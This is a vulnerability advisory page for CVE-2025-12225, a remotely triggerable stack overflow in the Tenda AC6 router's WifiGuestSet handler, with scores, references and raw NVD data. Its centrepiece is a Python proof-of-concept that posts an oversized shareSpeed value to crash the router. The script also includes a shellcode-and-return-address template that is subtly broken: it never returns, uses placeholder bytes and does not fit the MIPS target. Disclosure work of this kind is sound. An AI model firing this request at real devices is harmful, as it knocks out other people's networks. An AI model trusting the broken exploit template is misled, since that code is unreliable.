CVE-2025-12225

Description

A vulnerability has been found in Tenda AC6 15.03.06.50. This issue affects some unknown processing of the file /goform/WifiGuestSet of the component HTTP Request Handler. Such manipulation of the argument shareSpeed leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:ac6_firmware:15.03.06.50:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:tenda:ac6:2.0:*:*:*:*:*:*:* - NOT VULNERABLE

Tenda AC6 < 15.03.06.51

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-12225 PoC - Tenda AC6 WifiGuestSet Stack Buffer Overflow
# Target: Tenda AC6 Firmware 15.03.06.50
# Component: /goform/WifiGuestSet
# Attack Vector: shareSpeed parameter overflow

import requests
import sys

TARGET_IP = "192.168.0.1"  # Default router IP
TARGET_PORT = 80
TARGET_URL = f"http://{TARGET_IP}:{TARGET_PORT}/goform/WifiGuestSet"

# Stack overflow payload generation
# The exact offset may vary, this is a template
def generate_payload(offset=1000):
    # NOP sled for shellcode alignment
    nop_sled = b"\x90" * 200
    
    # Shellcode - binds shell to port 4444 (example)
    # This is a placeholder, actual shellcode depends on target architecture (MIPS little-endian)
    shellcode = b"\x00" * 100  # Placeholder for MIPS shellcode
    
    # Overflow with return address pointing to NOP sled
    padding = b"A" * (offset - len(nop_sled) - len(shellcode))
    return_address = b"\x42\x84\x04\x08"  # Example return address

def exploit(target_ip, share_speed_value="A" * 1500):
    """Send malicious request to trigger buffer overflow"""
    print(f"[*] Targeting: {target_ip}")
    print(f"[*] Sending payload with shareSpeed length: {len(share_speed_value)}")
    
    # Construct HTTP POST request
    data = {
        "shareSpeed": share_speed_value,
        "isEnable": "1",
        "guestSSID": "GuestNetwork"
    }
    
    try:
        response = requests.post(TARGET_URL, data=data, timeout=5)
        print(f"[!] Response status: {response.status_code}")
        return response
    except requests.exceptions.Timeout:
        print("[!] Request timed out - target may be vulnerable and crashed")
        return None
    except Exception as e:
        print(f"[!] Error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = TARGET_IP
    
    # Generate overflow payload
    payload = "A" * 1500
    exploit(target, payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12225
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12225
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12225/
[4] VulDB https://vuldb.com/cve/CVE-2025-12225
[5] https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda/WifiGuestSet/WifiGuestSet.md
[6] https://vuldb.com/?ctiid.329895
[7] https://vuldb.com/?id.329895
[8] https://vuldb.com/?submit.673547
[9] https://www.tenda.com.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12225", "sourceIdentifier": "[email protected]", "published": "2025-10-27T05:15:38.403", "lastModified": "2025-10-28T02:21:08.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Tenda AC6 15.03.06.50. This issue affects some unknown processing of the file /goform/WifiGuestSet of the component HTTP Request Handler. Such manipulation of the argument shareSpeed leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ac6_firmware:15.03.06.50:*:*:*:*:*:*:*", "matchCriteriaId": "ED890D2E-3860-4E6E-A1D4-FC0031430884"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ac6:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E382AD7E-1450-40FC-AE9D-698B491805F0"}]}]}], "references": [{"url": "https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda/WifiGuestSet/WifiGuestSet.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329895", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329895", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673547", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.tenda.com.cn/", "source": "[email protected]", "tags": ["Product"]}]}}